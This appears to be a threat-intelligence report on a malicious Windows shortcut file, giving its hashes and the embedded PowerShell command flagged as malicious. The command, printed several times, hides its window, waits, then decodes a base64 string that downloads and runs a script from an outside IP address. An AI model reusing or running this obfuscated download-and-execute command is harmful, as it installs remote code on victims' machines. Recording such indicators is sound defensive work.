| Hash | Hash Value |
|---|---|
| MD5 | e00cfc5dd0a4ed9186ed52200da4eeef |
| Sha1 | 08fea2b857bf43655e9f719a3b7213fe78641d1a |
| Sha256 | 860704e66a998d3d77061e79b39ce90339d8e6ff4637559542fea06f519f82a5 |
| Sha384 | 5931d7086b88d0a7bf1041ecd705920553a214e63e5a202a2ddaae8b9a931b544c89837e87f64fc9d415890d3ad7083a |
| Sha512 | 72c71cf561137c72bc2186aae0414ea478ff283783d73f427423e279f4a1142704bff11295d133804b7056b0581074f0c3ad1d7cda69be5c952cd8d41e56486a |
| SSDeep | 24:8w4/BHYVKVWf+/CWCNUoxOhpCxKwRIZJ99cc+VrabxJlpl9l:8B5aRNBmse9cBRadrL9 |
| TLSH | 6C3167042BF60308F7F38B75A4FAB624D97BFC56EE519F8D008542481431524F8A6F2B |

| Name0 | Value |
|---|---|
| LNK: Command Execution | powershell.exe -Sta -w h -Command Start-Sleep -S 30; $fwY = 'aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg='; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fwY))) |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) |

| Name0 | Value | Location |
|---|---|---|
| LNK: Command Execution | powershell.exe -Sta -w h -Command Start-Sleep -S 30; $fwY = 'aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg='; iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($fwY))) Malicious | e00cfc5dd0a4ed9186ed52200da4eeef |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) Malicious | e00cfc5dd0a4ed9186ed52200da4eeef > LNK CommandLine |
| Deobfuscated PowerShell | -sta -w "h" -Command "Start-Sleep" -S 30 $fwY = "aXdyIC1VcmkgaHR0cDovLzE3OC4xNy42Mi45OjgyL21vY2VuIC1Vc2VCYXNpY1BhcnNpbmcgfCBpZXg=" Invoke-Expression ([Encoding]::"ASCII"."GetString"([Convert]::"FromBase64String"($fwY))) Malicious | e00cfc5dd0a4ed9186ed52200da4eeef > LNK CommandLine > [Deobfuscated PS] |